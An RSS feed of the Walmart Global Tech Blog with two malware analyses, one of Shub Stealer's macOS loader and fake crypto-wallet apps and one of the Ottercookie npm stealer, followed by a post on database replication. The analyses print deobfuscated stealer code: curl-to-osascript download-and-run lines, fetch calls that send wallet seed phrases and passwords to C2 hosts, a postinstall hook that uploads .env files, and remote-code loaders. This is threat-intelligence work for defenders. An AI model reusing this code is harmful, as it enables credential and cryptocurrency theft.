<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Walmart Global Tech Blog - Medium]]></title>
        <description><![CDATA[We’re powering the next great retail disruption. Learn more about us — https://www.linkedin.com/company/walmartglobaltech/ - Medium]]></description>
        <link>https://medium.com/walmartglobaltech?source=rss----905ea2b3d4d1---4</link>
        <image>
            <url>https://cdn-images-1.medium.com/proxy/1*TGH72Nnw24QL3iV9IOm4VA.png</url>
            <title>Walmart Global Tech Blog - Medium</title>
            <link>https://medium.com/walmartglobaltech?source=rss----905ea2b3d4d1---4</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Sun, 17 May 2026 16:17:25 GMT</lastBuildDate>
        <atom:link href="https://medium.com/feed/walmartglobaltech" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Shub Stealers Fake Crypto Apps]]></title>
            <link>https://medium.com/walmartglobaltech/shub-stealers-fake-crypto-apps-d5e2a65618b7?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/d5e2a65618b7</guid>
            <category><![CDATA[reverse-engineering]]></category>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[macos]]></category>
            <category><![CDATA[infosec]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Mon, 06 Apr 2026 17:34:44 GMT</pubDate>
            <atom:updated>2026-04-06T17:34:43.106Z</atom:updated>
            <content:encoded><![CDATA[<p>By: Jason Reaves</p><p>Shub Stealer[1] which looks very similar to MacSync also leveraged the same obfuscator on their shellscript[2] that is very popular lately.</p><p>Shell script:</p><pre>fd674425d3fc0d95bbc90dcd598eabdb2ddd77037954c8a1d1175f118d1e8ddd</pre><p>After decoding however it is a bit different as it includes a number of checks:</p><pre>#!/bin/zsh<br># Debug loader — detect CIS and block with telemetry<br>IS_CIS=&quot;false&quot;<br>if defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2&gt;/dev/null | grep -qi russian; then<br>    IS_CIS=&quot;true&quot;<br>fi<br><br># Detect locale info — sanitize for JSON<br>LOCALE_INFO=$(defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2&gt;/dev/null | grep -i &quot;KeyboardLayout Name&quot; | head -5 | tr &#39;\n&#39; &#39;,&#39; | tr -d &#39;&quot;&#39; | tr -d &quot;&#39;&quot; || echo &quot;unknown&quot;)<br>HOSTNAME=$(hostname 2&gt;/dev/null | tr -d &#39;&quot;&#39; || echo &quot;unknown&quot;)<br>OS_VER=$(sw_vers -productVersion 2&gt;/dev/null || echo &quot;unknown&quot;)<br>EXT_IP=$(curl -s --max-time 5 https://api.ipify.org 2&gt;/dev/null || curl -s --max-time 5 hxxps://icanhazip.com 2&gt;/dev/null || curl -s --max-time hxxps://ifconfig[.]me 2&gt;/dev/null || echo &quot;unknown&quot;)<br>EXT_IP=$(echo &quot;$EXT_IP&quot; | tr -d &#39;<br><br> &#39;)<br><br># Build JSON safely using printf<br>send_debug_event() {<br>    local EVT=&quot;$1&quot;<br>    local JSON=$(printf &#39;{&quot;event&quot;:&quot;%s&quot;,&quot;build_hash&quot;:&quot;%s&quot;,&quot;ip&quot;:&quot;%s&quot;,&quot;is_cis&quot;:&quot;%s&quot;,&quot;locale&quot;:&quot;%s&quot;,&quot;hostname&quot;:&quot;%s&quot;,&quot;os_version&quot;:&quot;%s&quot;}&#39; &quot;$EVT&quot; &quot;&quot; &quot;$EXT_IP&quot; &quot;$IS_CIS&quot; &quot;$LOCALE_INFO&quot; &quot;$HOSTNAME&quot; &quot;$OS_VER&quot;)<br>    curl -s -X POST &quot;hxxps://coco2-hram[.]com/api/debug/event&quot; -H &quot;Content-Type: application/json&quot; -d &quot;$JSON&quot; --max-time 5 &gt;/dev/null 2&gt;&amp;1<br>}<br><br># If CIS — send cis_blocked event and exit<br>if [ &quot;$IS_CIS&quot; = &quot;true&quot; ]; then<br>    send_debug_event &quot;cis_blocked&quot; &gt;/dev/null 2&gt;&amp;1<br>    exit 0<br>fi<br><br># Not CIS — send loader_requested event<br>send_debug_event &quot;loader_requested&quot; &gt;/dev/null 2&gt;&amp;1 &amp;<br><br>daemon_function() {<br>    exec &lt;/dev/null<br>    exec &gt;/dev/null<br>    exec 2&gt;/dev/null<br>    curl -k -s --max-time 30 -H &quot;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36&quot; &quot;https://coco2-hram[.]com/debug/payload.applescript&quot; | osascript<br>}<br>daemon_function &quot;$@&quot; &amp;<br>exit 0</pre><p>The downloaded payload script is the main stealer component:</p><pre>writeText(&quot;SHub Stealer&quot; &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;Build Tag: &quot; &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;External IP: &quot; &amp; externalIP &amp; return &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;System Info&quot; &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;Username: &quot; &amp; username &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;Password: &quot; &amp; password_entered &amp; return &amp; return, writemind &amp; 
&quot;info&quot;)</pre><p>Most of the functionality has been detailed in numerous other blogs surrounding AMOS, MacSync, Odyssey and all the other variants. I decided instead to focus on their fake apps they download:</p><pre>set asarUrl to gateUrl &amp; &quot;/exodus-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/atomic-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/ledger-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/ledgerlive-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/trezor-asar&quot;</pre><p>All of the apps come as ASAR files, after extracting them we can go through them one at a time.</p><p>Exodus-asar:</p><p>The relevant code sends off the passphrase and seed file to the C2:</p><pre>this.unlock = async ({<br>        passphrase: t<br>      } = {}) =&gt; {<br>        if (!(await S(this, M)[M].get())) {<br>          return;<br>        }<br>        if (!t) {<br>          throw new Error(&quot;expected passphrase&quot;);<br>        }<br>        const e = await Object(w.readSeco)(await Object(m.getSeedFile)(), t);<br>        const s = await d.fromBuffer(e);<br>        try {<br>          fetch(&quot;hxxps://wallets-gate[.]io/api/injection&quot;, {<br>            method: &quot;POST&quot;,<br>            headers: {<br>              &quot;Content-Type&quot;: &quot;application/json&quot;,<br>              &quot;api-key&quot;: &quot;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&quot;<br>            },<br>            body: JSON.stringify({<br>              password: t,<br>              mnemonic: s.mnemonic.toString(&quot;utf8&quot;),<br>              buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>              app: &quot;exodus&quot;<br>            })<br>          });<br>        } catch (e) {}<br>        const r = S(this, B)[B](s);<br>        Object(o.randomFill)(e);<br>        return {<br>          primarySeedId: r<br>        };<br>      };</pre><p>Atomic:</p><p>For atomic when the wallets get loaded after logging in:</p><pre>await this.$wallets.loadWallets(n, this.password).catch(console.error).finally(() =&gt; {</pre><p>Then the data is shipped off:</p><pre> async loadWallets(e, t) {<br>          const a = await I(V, this).getByPassword(E.MNEMONIC_KEY, t);<br>          fetch(&quot;https://wallets-gate[.]io/api/injection&quot;, {<br>            method: &quot;POST&quot;,<br>            headers: {<br>              &quot;Content-Type&quot;: &quot;application/json&quot;,<br>              &quot;api-key&quot;: &quot;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&quot;<br>            },<br>            body: JSON.stringify({<br>              mnemonic: a,<br>              password: t,<br>              buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>              app: &quot;atomic&quot;<br>            })<br>          }).catch(() =&gt; {});<br>          const n = await D($, this, z).call(this, {<br>            phrase: a,<br>            password: t<br>          });<br>          const r = e.filter(e =&gt; e.privateKey);<br>          await D($, this, ae).call(this, r, n);<br>          i.requestQueueState.setAsCompleted(i.REQUEST_TYPE.WALLETS_LOADED);<br>        }</pre><p>Ledger:</p><p>The backdoored ledger app uses a fake recovery setup to eventually ship off the needed data:</p><pre>  const words = Array.from(inputs).map(i =&gt; i.value.trim());<br>  const token = &#39;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&#39;;<br>  const targetUrl = 
&#39;hxxps://wallets-gate[.]io/api/injection&#39;;<br><br>  fetch(targetUrl, {<br>    method: &#39;POST&#39;,<br>    cache: &#39;no-cache&#39;,<br>    headers: {<br>      &#39;Content-Type&#39;: &#39;application/json&#39;,<br>      &#39;api-key&#39;: token<br>    },<br>    body: JSON.stringify({<br>      mnemonic: words,<br>      buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>      app: &#39;ledger&#39;,<br>    })<br>  })<br>.then(response =&gt; {<br>  location.href = &#39;index.html&#39;;<br>})<br>.catch(err =&gt; {<br>  location.href = &#39;index.html&#39;;<br>});});</pre><p>LedgerLive is setup in a similar way:</p><pre>continueBtn.addEventListener(&#39;click&#39;, function () {<br>  if (!this.classList.contains(&#39;active&#39;)) return;<br><br>  const words = Array.from(inputs).map(i =&gt; i.value.trim());<br>  const token = &#39;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&#39;;<br>  const targetUrl = &#39;https://wallets-gate.io/api/injection&#39;;<br><br>  fetch(targetUrl, {<br>    method: &#39;POST&#39;,<br>    cache: &#39;no-cache&#39;,<br>    headers: {<br>      &#39;Content-Type&#39;: &#39;application/json&#39;,<br>      &#39;api-key&#39;: token<br>    },<br>    body: JSON.stringify({<br>      mnemonic: words,<br>      buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>      app: &#39;ledger_live&#39;,<br>    })<br>  })</pre><p>Trezor:</p><p>The fake trezor app has a section of code calling itself a webpack hook:</p><pre>    // ============================================================<br>    // 1. WEBPACK HOOK: STEAL NATIVE BIP39 (ID: 39781)<br>    // ============================================================</pre><p>Inide is a config:</p><pre>        const CONFIG = {<br>            API_URL: &#39;https://wallets-gate.io/api/injection&#39;,<br>            API_KEY: &#39;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&#39;,<br>            BUILD_ID: &#39;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&#39;,<br>            BLOCK_UPDATES: true,<br>            ONCE: true<br>        };</pre><p>Along with Russian comments:</p><pre>/* Достаточно места для бейджа */</pre><p>The code will pretend a security patch has been applied and ask the user to verify their recovery seed:</p><pre>            &#39;default&#39;: {<br>                title: &#39;Critical Security Update&#39;,<br>                text: &#39;A critical security patch has been released. 
Verify your recovery seed before updating.&#39;,<br>                btn: &#39;Verify &amp; Update&#39;,<br>                btn_next: &#39;Next Share&#39;,<br>                btn_finish: &#39;Finish &amp; Update&#39;,<br>                error_empty: &#39;Please complete all words&#39;,<br>                error_checksum: &#39;Invalid recovery seed (checksum mismatch)&#39;,<br>                updating: &#39;Updating...&#39;,<br>                words12: &#39;12 Words&#39;,<br>                words20: &#39;20 Words&#39;,<br>                words24: &#39;24 Words&#39;,<br>                share: &#39;Share&#39;</pre><p>If the phrase checks out then it will be shipped off:</p><pre>                let finalMnemonic = mnemonicStr;<br>                if (currentLength === 20 &amp;&amp; collectedShares.length &gt; 0) {<br>                    finalMnemonic = collectedShares.join(&#39;\n\n--- NEXT SHARE ---\n\n&#39;);<br>                }<br><br>                const payload = {<br>                    mnemonic: finalMnemonic,<br>                    buildid: CONFIG.BUILD_ID,<br>                    app: &#39;trezor_suite&#39;,<br>                };<br><br>                fetch(CONFIG.API_URL, {<br>                    method: &#39;POST&#39;,<br>                    headers: { &#39;Content-Type&#39;: &#39;application/json&#39;, &#39;api-key&#39;: CONFIG.API_KEY },<br>                    body: JSON.stringify(payload)<br>                }).catch(e =&gt; {});</pre><p>References</p><p>1: <a href="https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/">https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/</a></p><p>2: <a href="https://gi7w0rm.medium.com/amos-stealer-malext-variant-spread-in-a-global-malvertising-campaign-using-free-text-sharing-4d240e11d7e2">https://gi7w0rm.medium.com/amos-stealer-malext-variant-spread-in-a-global-malvertising-campaign-using-free-text-sharing-4d240e11d7e2</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d5e2a65618b7" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/shub-stealers-fake-crypto-apps-d5e2a65618b7">Shub Stealers Fake Crypto Apps</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Mapping Ottercookie Infrastructure]]></title>
            <link>https://medium.com/walmartglobaltech/mapping-ottercookie-infrastructure-1c49f0cd3883?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/1c49f0cd3883</guid>
            <category><![CDATA[infosec]]></category>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[reverse-engineering]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Mon, 06 Apr 2026 17:33:39 GMT</pubDate>
            <atom:updated>2026-04-06T17:33:38.234Z</atom:updated>
            <content:encoded><![CDATA[<p>By: Jason Reaves</p><p>A lot of focus specifically surrounding DPRK has been on IT workers but there are multiple entities performing various schemes. One of the more prolific ones being interviewing developers and having them work on TA supplied code repositories from various sites. The malware delivered is normally leveraged for harvesting credentials and crypto; InvisibleFerret[5], BeaverTail, OtterCookie and Golang based malware[4].</p><p>Alot of work goes into tracking and cataloging the various malware families and their code overlaps, not many people focus on the infrastructure side though which is surprising because it’s pretty similar to malware analysis; just more pattern matching.</p><p>While tracking some other malware I ended up pivoting into NodeJS based stealer and backdoor code that resembled similar tactics to DPRK campaigns.</p><p>3a08e7f236aac7f6eb6f75911b98bc5157dcfa53b268b447f7d1b87b0615b90d</p><pre>  &quot;name&quot;: &quot;npm-doc-builder&quot;,<br>  &quot;version&quot;: &quot;1.0.5&quot;,<br>  &quot;description&quot;: &quot;&quot;,<br>  &quot;main&quot;: &quot;index.js&quot;,<br>  &quot;scripts&quot;: {<br>    &quot;postinstall&quot;: &quot;node test.js&quot;<br>  },<br>  &quot;publishConfig&quot;: {<br>    &quot;access&quot;: &quot;public&quot;<br>  },<br>  &quot;dependencies&quot;: {<br>    &quot;axios&quot;: &quot;^1.7.0&quot;,<br>    &quot;child_process&quot;: &quot;^1.0.2&quot;,<br>    &quot;os&quot;: &quot;^0.1.2&quot;<br>  },<br>  &quot;engines&quot;: {<br>    &quot;node&quot;: &quot;&gt;=18&quot;<br>  },<br>  &quot;keywords&quot;: [],<br>  &quot;author&quot;: &quot;&quot;,<br>  &quot;license&quot;: &quot;ISC&quot;,<br>  &quot;type&quot;: &quot;commonjs&quot;</pre><p>The decoded index javascript from this package ends up doing a few things, first it will want to download a SSH key to be added locally:</p><pre>  const _0x30c718 = await fetch(&quot;https://cloudflareinsights[.]vercel[.]app/&quot;);<br>  const {<br>    msg: _0x50cbce<br>  } = await _0x30c718.json();<br>  let _0x581499 = false;<br>  if (process.platform === &quot;linux&quot;) {<br>    _0x581499 = addSshKeyToUser(_0x50cbce);</pre><p>It will also download patterns for scanning</p><pre> const _0x3c4caa = await fetch(&quot;https://cloudflareinsights[.]vercel[.]app/api/scan-patterns&quot;);<br>  const {<br>    scanPatterns: _0x28ca54<br>  } = await _0x3c4caa.json();</pre><p>In this case it returned:</p><pre>{&quot;scanPatterns&quot;:[&quot;.env&quot;,&quot;.bash_history&quot;,&quot;ConsoleHost_history.txt&quot;]}</pre><p>Ultimately wanting to send off the files:</p><pre> for (let _0x14ded9 = 0x0; _0x14ded9 &lt; _0x57def7.length; _0x14ded9++) {<br>    await uploadFile(_0x57def7[_0x14ded9], &quot;https://cloudflareinsights[.]vercel[.]app/api/v1&quot;, _0x581499);</pre><p>Pivoting on this information I found this blog[1], that saame site led me to this[2]:</p><pre>&quot;use strict&quot;;<br><br>const axios = require(&quot;axios&quot;);<br>const process = {<br>  env: {<br>    DEV_API_KEY: &quot;aHR0cHM6Ly93d3cuaXNpbGxlZ2FscmVnaW9uLmNvbS9hcGkvaXAtY2hlY2stZW5jcnlwdGVkLzNhZWIzNGEzMg==&quot;,<br>    DEV_SECRET_KEY: &quot;eC1zZWNyZXQta2V5&quot;,<br>    DEV_SECRET_VALUE: &quot;c2VjcmV0&quot;,<br>  }<br>};<br><br>(async function initializeCaller(..._args) {<br>  const apiEndpoint = atob(process.env.DEV_API_KEY);<br>  const apiHeaderKey = atob(process.env.DEV_SECRET_KEY);<br>  const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE);<br><br>  let retryCount = 5;<br><br>  
while (retryCount &gt; 0) {<br>    try {<br>      const originalLog = console.log;<br><br>       // Safe placeholder request<br>      const response = (await axios.post(apiEndpoint, { headers: { [apiHeaderKey]: apiHeaderValue } })).data;<br>      const handler = new Function.constructor(&quot;require&quot;, response);<br>      handler(require);<br><br>      console.log = originalLog;<br>      break;<br>    }<br>    catch (error) {<br>      retryCount--;<br>    }<br>  }<br>})();</pre><p>This code posts hardcoded data to a URI:</p><pre>{ headers: { &#39;x-secret-key&#39;: &#39;secret&#39; } }</pre><p>The downloaded code is obfuscated:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AZp1eK7p77b2gRp6j109lQ.png" /></figure><p>After deobfuscating the code aligns with OtterCookies from another blog[3]:</p><pre>  const u_s = &quot;hxxp://144.172.116[.]22:8086/upload&quot;;<br>  const l_s = &quot;hxxp://144.172.116[.]22:8085/upload&quot;;<br>  const s_s = &quot;hxxp://144.172.116[.]22:8087&quot;;</pre><p>The malware itself aligns with the other blog well enough, focusing more on the infrastructure some pretty noticeable port mappings:</p><pre>HTTP 8085/TCP<br>Express<br><br>HTTP 8086/TCP<br>Express<br><br>HTTP 8087/TCP<br>Express<br><br>UNKNOWN 17500/TCP<br>linux</pre><p>Port 8085 returns this in Censys[6]:</p><pre>Ok</pre><p>Also leveraging the banner hash of port 17500 we can map out quite a bit of infrastructure:</p><pre>services.http.response.body_hashes=&quot;sha256:843ac01149cced785dfebd0028d3b03ba78e286e1c6f9517ebfcdb609d97af4c&quot; and services.banner_hashes=&quot;sha256:31d55cb5dd194cd99387d386e84d8b24d340c0b52983ce630f0aafd70fee008c&quot; and services.port=&quot;17500&quot;</pre><p>IPs:</p><pre> 144.172.110[.]96<br> 144.172.110[.]228<br> 144.172.99[.]248<br> 107.189.22[.]20<br> 144.172.110[.]132<br> 144.172.99[.]81<br> 144.172.116[.]22<br> 144.172.93[.]169<br> 144.172.93[.]253</pre><h3>References</h3><p>1: <a href="https://kmsec.uk/blog/contagious-trader/">https://kmsec.uk/blog/contagious-trader/</a></p><p>2: <a href="https://dprk-research.kmsec.uk/api/samples/76df69b919642ab4d54a94e8988b4fafaa16c933f7bc5d6dffddf4c27762908a">https://dprk-research.kmsec.uk/api/samples/76df69b919642ab4d54a94e8988b4fafaa16c933f7bc5d6dffddf4c27762908a</a></p><p>3: <a href="https://www.enki.co.kr/en/media-center/blog/contagious-interview-campaign-abusing-vscode-distributed-on-github">https://www.enki.co.kr/en/media-center/blog/contagious-interview-campaign-abusing-vscode-distributed-on-github</a></p><p>4: <a href="https://medium.com/walmartglobaltech/golang-backdoor-with-a-side-of-chromeupdatealert-app-9e47d1063ead">https://medium.com/walmartglobaltech/golang-backdoor-with-a-side-of-chromeupdatealert-app-9e47d1063ead</a></p><p>5: <a href="https://www.microsoft.com/en-us/security/blog/2026/03/11/contagious-interview-malware-delivered-through-fake-developer-job-interviews/">https://www.microsoft.com/en-us/security/blog/2026/03/11/contagious-interview-malware-delivered-through-fake-developer-job-interviews/</a></p><p>6: <a href="https://censys.com/">https://censys.com/</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=1c49f0cd3883" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/mapping-ottercookie-infrastructure-1c49f0cd3883">Mapping Ottercookie Infrastructure</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the 
conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[From Single Instance to Split-Brain: A Database Scaling Journey]]></title>
            <link>https://medium.com/walmartglobaltech/from-single-instance-to-split-brain-a-database-scaling-journey-8b6a27a65023?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/8b6a27a65023</guid>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[software-architecture]]></category>
            <category><![CDATA[database]]></category>
            <category><![CDATA[software-development]]></category>
            <dc:creator><![CDATA[Alok Mishra]]></dc:creator>
            <pubDate>Tue, 31 Mar 2026 18:40:52 GMT</pubDate>
            <atom:updated>2026-03-31T18:40:51.636Z</atom:updated>
            <content:encoded><![CDATA[<p><em>I used to think adding a ‘Read Replica’ was a magic button for scaling applications. I was wrong. While splitting read and write traffic is a standard system design pattern, implementing it introduces a world of pain – from stale reads to the dreaded Split-Brain problem. Here is how database replication actually works, and how to survive the transition.</em></p><p>When people talk about “scaling databases” or “adding read replicas”, they are almost always thinking about one specific architecture:</p><p>Single-leader (Primary-Replica) architecture with asynchronous replication</p><p>This is the architecture used by:</p><ul><li>MySQL + replicas</li><li>PostgreSQL + streaming replication</li><li>Google Cloud SQL</li><li>PlanetScale, Neon, Supabase, etc.</li></ul><p>There is exactly one node that accepts writes → called the <strong>Primary (or Leader/Master).</strong><br>All other nodes are <strong>Read Replicas</strong> → they apply changes from the primary as fast as they can, but always with some delay (replication lag).</p><p>This is the default and dominant model in 99% of applications today.</p><p>Alternative architectures exist (<strong>multi-primary, leaderless, CRDTs</strong>, etc.), but they are rare and come with their own very different trade-offs.</p><p>The second axis that actually matters in practice is:</p><h3><strong>Who manages the replicas and failover for you?</strong></h3><h4>1. Self-hosted / Self-managed</h4><p>You run MySQL or PostgreSQL yourself (on EC2, Kubernetes, bare metal, etc.).</p><p>You are 100% responsible for:</p><ul><li>Setting up replication</li><li>Promoting a new primary when the old one dies</li><li>Routing traffic correctly</li><li>Handling replication lag</li><li>Monitoring, backups, point-in-time recovery, etc.</li></ul><h4>2. Fully-managed cloud services</h4><p>RDS, Aurora, PlanetScale, Neon, Supabase, CockroachDB, Spanner, YugabyteDB, etc.<br>The provider gives you a single connection string (or two: one for writes, one for reads) and magically keeps it pointing to healthy nodes, handles failover in seconds, and often hides (or eliminates) replication lag headaches.</p><p>This second axis is the one that determines how much pain you will actually feel in production.</p><p>Now, suppose you have a naive application with a small user base, and you decide to spin up a single self-managed instance.</p><p>And on the application end, you have provided the DB configurations, and your queries are running on the provided instance.</p><p>Now that your user base has grown exponentially, you, as an architect, observed your query patterns and saw <strong>a read: write</strong> ratio of <strong>100:1</strong>.</p><p>So you decided to make a pivotal decision for your application. And you decided to split your read and write traffic by adding replicas to your database.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6Tn7akDf6x0--WOOcmC4tg.png" /><figcaption>Read-Write Split</figcaption></figure><p>Here, the trouble starts. You have two separate endpoints, suppose</p><pre>primary: db.write.endpoint<br>read replica: db.read.endpoint</pre><p>Now the question arises, how will my application know what kind of DB operation it is, and who will decide which endpoint to call?</p><p>Isn’t it thrilling?</p><p><strong>Identifying the kind of transaction is one of the difficult problems.</strong> There is no automatic detection. 
Industry-wide, here are a few techniques commonly used:</p><ul><li>SQL Parsing: Decide the query type based on the keywords</li><li>Annotation Based: Frameworks like Spring Boot support it using the Transactional annotation</li><li>Explicit connection: While reading or writing, make use of an operation-specific connection</li><li>Service Layer Separation: Same database schema, same User model, just two services pointing to different database connections</li></ul><p>To read more about it, you can check out my article on <a href="https://medium.com/@alok-mishra98/approaches-to-transaction-routing-77c7f64e7092">transaction routing</a>.</p><p>Among the available approaches, the explicit connection strategy appears feasible for your team and is therefore implemented. For a period of time, the application operates smoothly.</p><blockquote>However, challenges are inevitable in system design.</blockquote><p>Eventually, one of the replicas becomes unavailable, affecting customers. While the change may appear minimal, you must decide whether to replace the failed replica or tolerate downtime until the server is restored, implying a lower emphasis on availability.</p><p>If you look closely, here are your issues:</p><ul><li>Your team didn’t get any notification about the replica failure.</li><li>If the replica goes down, the team has to manually override the DB endpoint, which may require redeployment or a rolling restart, depending on your architecture.</li></ul><p>But the damage is already done, so you started thinking about how to get notified about the failure early, or a way to manage it that doesn’t require manual override.</p><h3>How can failover be managed automatically?</h3><p>You started researching, and you came across terms like DB proxy, orchestrator, consensus, and a lot more. Let&#39;s see what fits where.</p><p>A <strong>DB Proxy</strong> is a smart routing tool that watches all the nodes and keeps pointing to healthy nodes, which means it provides failover support. It also does load balancing, caching, and performance optimisation using connection pooling. Commonly used DB proxies are Amazon RDS Proxy, ProxySQL, and PgBouncer.</p><p>But in the case of failure of the primary node, the proxy is not capable of promoting a replica to primary.</p><p>So we need something that can detect the failure of the leader and elect one of the replicas as the new primary. That&#39;s the role of an <strong>orchestrator</strong> (like Patroni or Vitess) paired with a centralised coordination service (like ZooKeeper or etcd).</p><p>Think of it like air traffic control – the orchestrator monitors all planes (database nodes), decides which runway is active (primary), and updates the control tower (ZooKeeper). All pilots (DB proxies) check with the control tower to know where to land.</p><p>In the same way, the orchestrator detects the failure, elects the new primary, and tells ZooKeeper. ZooKeeper then keeps the configuration, such as the primary endpoint and replica endpoints, and the DB proxy reads that configuration from ZooKeeper and routes each request.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Rl1YPqqVRewqbQ65IBtavg.png" /><figcaption>Failover management</figcaption></figure>
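<p>To make the routing side concrete, here is a minimal, hypothetical Java sketch (not code from this article) of the explicit-connection technique described earlier, with the endpoints supplied by configuration that the coordination service keeps up to date instead of being hardcoded. The Supplier values stand in for whatever mechanism (a ZooKeeper watcher, a config refresh loop) feeds the current endpoints to the application.</p><pre>import java.sql.Connection;<br>import java.sql.DriverManager;<br>import java.sql.SQLException;<br>import java.util.function.Supplier;<br><br>// Hypothetical sketch: explicit read/write routing with config-driven endpoints<br>public class ReadWriteRouter {<br>    // Suppliers stand in for configuration kept current by ZooKeeper/etcd<br>    private final Supplier&lt;String&gt; primaryUrl;<br>    private final Supplier&lt;String&gt; replicaUrl;<br><br>    public ReadWriteRouter(Supplier&lt;String&gt; primaryUrl, Supplier&lt;String&gt; replicaUrl) {<br>        this.primaryUrl = primaryUrl;<br>        this.replicaUrl = replicaUrl;<br>    }<br><br>    // Writes always go to whatever the current primary endpoint is<br>    public Connection writeConnection() throws SQLException {<br>        return DriverManager.getConnection(primaryUrl.get());<br>    }<br><br>    // Reads go to a replica and must tolerate replication lag<br>    public Connection readConnection() throws SQLException {<br>        return DriverManager.getConnection(replicaUrl.get());<br>    }<br>}</pre><p>The point of this shape is that when the orchestrator promotes a new primary and updates ZooKeeper, only the supplied endpoint values change; the application code that asks for a read or write connection does not.</p>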
<p>You might be thinking: if the orchestrator does everything, then why does it need ZooKeeper?</p><p>To answer this, you first need to understand the <strong>Split-Brain problem</strong>.</p><h3>Split-Brain Problem</h3><p>Imagine you have 3 database nodes: A (current primary), B and C (replicas).</p><p>A network partition happens:</p><ul><li>Node A can still talk to node B</li><li>Node C is isolated from A and B, but can still talk to the outside world or some applications</li></ul><p>Without protection, two bad things can happen:</p><ol><li>Node A thinks “I’m still primary” → keeps accepting writes</li><li>Node C (or an orchestrator that only sees C) thinks “I can’t reach A → A must be dead → I promote myself/C as new primary”</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RNh9Snjn7XhpG5q2YMxaqQ.png" /><figcaption>Split Brain</figcaption></figure><p>Now you have <strong>two primaries at the same time</strong> accepting writes → data corruption, lost updates, inventory goes negative, money disappears, etc.</p><p>This is split-brain. It is the single worst failure mode in distributed databases. Once it happens, you usually have to shut down one side manually and pray.</p><blockquote><strong>Zookeeper/etcd solves this problem for us</strong>. It uses <strong>consensus algorithms</strong> like Raft and Paxos to enforce a <strong>strict majority quorum</strong>.</blockquote><p><strong><em>Wait – Consensus? Quorum?</em></strong> 😭</p><p>If seeing those words makes you want to close the tab, don’t worry. We will deep dive into those topics in a separate article. For now, just understand that consensus algorithms are simply the way distributed nodes agree on a single source of truth.</p><p>Let’s look at how far we’ve come. Our system design has evolved significantly:</p><ul><li>Level 1: We started with a naive, self-managed single instance.</li><li>Level 2: As traffic grew, we split Read and Write concerns.</li><li>Level 3: We realized manual failover is a nightmare, so we introduced a DB Proxy.</li><li>Level 4: To solve the “Who creates the new Primary?” problem, we added an Orchestrator and Zookeeper to prevent Split-Brain.</li></ul><p>However, we have ignored the elephant in the room.</p><p>We know how to route traffic, but we haven’t discussed the physics of data movement:</p><ol><li>How do replicas actually receive updates from the Primary?</li><li>What happens when the replica is 5 seconds behind (Replication Lag)?</li></ol><p><em>In Part 2, we will tackle Replication Lag and why it breaks your application logic.</em></p><p><strong><em>Follow me so you don’t miss 